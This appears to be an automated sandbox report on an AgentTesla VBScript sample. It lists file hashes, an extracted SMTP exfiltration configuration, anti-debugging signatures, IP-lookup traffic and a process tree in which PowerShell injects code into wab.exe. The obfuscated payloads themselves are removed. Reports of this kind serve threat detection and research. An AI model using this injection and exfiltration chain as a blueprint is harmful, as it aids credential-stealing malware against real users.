Analysis
- max time kernel: 147s
- max time network: 139s
- platform: windows7_x64
- resource: win7-20240611-en
- resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
- submitted: 18-06-2024 09:36
Static task: static1
Behavioral task: behavioral1
- Sample: STS_Bunker_00617.vbs
- Resource: win7-20240611-en
Behavioral task: behavioral2
- Sample: STS_Bunker_00617.vbs
- Resource: win10v2004-20240508-en
General
- Target: STS_Bunker_00617.vbs
- Size: 92KB
- MD5: dfe2a23100ac3263583e69f48e9b32e6
- SHA1: 20087641aba69eaaaef0f87a7d21edd8a255db60
- SHA256: 9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
- SHA512: 48b5bf8605415ead17d375adc9613b73f8e3f80132086f2a3ef11df7684e1d43ad4f97aee65967986a9964d81edcd7043d7faaf720fcd1f73052411d43153038
- SSDEEP: 1536:V01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5eW8VLOExkzL:V09LB0DnWzhX7RXaSMxhxsAhWEwhrdMh
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Port: 587
- Username: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (2 IoCs)
  Processes (flow, PID, process):
  - flow 3: 2828 powershell.exe
  - flow 5: 2828 powershell.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, IoC):
  - flow 12: api.ipify.org
  - flow 13: api.ipify.org
  - flow 14: ip-api.com
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  Processes (PID, process):
  - 596 wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes (PID, process):
  - 2756 powershell.exe
  - 596 wab.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description, PID, process, target process):
  - PID 2756 set thread context of 596: 2756 powershell.exe -> 596 wab.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (PID, process):
  - 2828 powershell.exe
  - 2756 powershell.exe (2 events)
  - 596 wab.exe (2 events)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes (PID, process):
  - 2756 powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, PID, process):
  - Token: SeDebugPrivilege, 2828 powershell.exe
  - Token: SeDebugPrivilege, 2756 powershell.exe
  - Token: SeDebugPrivilege, 596 wab.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description, PID, process, target process):
  - PID 2996 wrote to memory of 2828: WScript.exe -> powershell.exe (3 events)
  - PID 2828 wrote to memory of 1604: powershell.exe -> cmd.exe (3 events)
  - PID 2828 wrote to memory of 2756: powershell.exe -> powershell.exe (4 events)
  - PID 2756 wrote to memory of 2700: powershell.exe -> cmd.exe (4 events)
  - PID 2756 wrote to memory of 596: powershell.exe -> wab.exe (6 events)
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
  Signatures:
  - Suspicious use of WriteProcessMemory
  PID: 2996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
  Command line: powershell -windowstyle 1 "<obfuscated PowerShell script removed>"
  Signatures:
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2828
- C:\Windows\system32\cmd.exe (depth 3)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
  PID: 1604
- C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
  Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script removed>"
  Signatures:
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2756
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
  PID: 2700
- C:\Program Files (x86)\windows mail\wab.exe (depth 4)
  Command line: "C:\Program Files (x86)\windows mail\wab.exe"
  Signatures:
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 596
Network
MITRE ATT&CK Enterprise v15
Downloads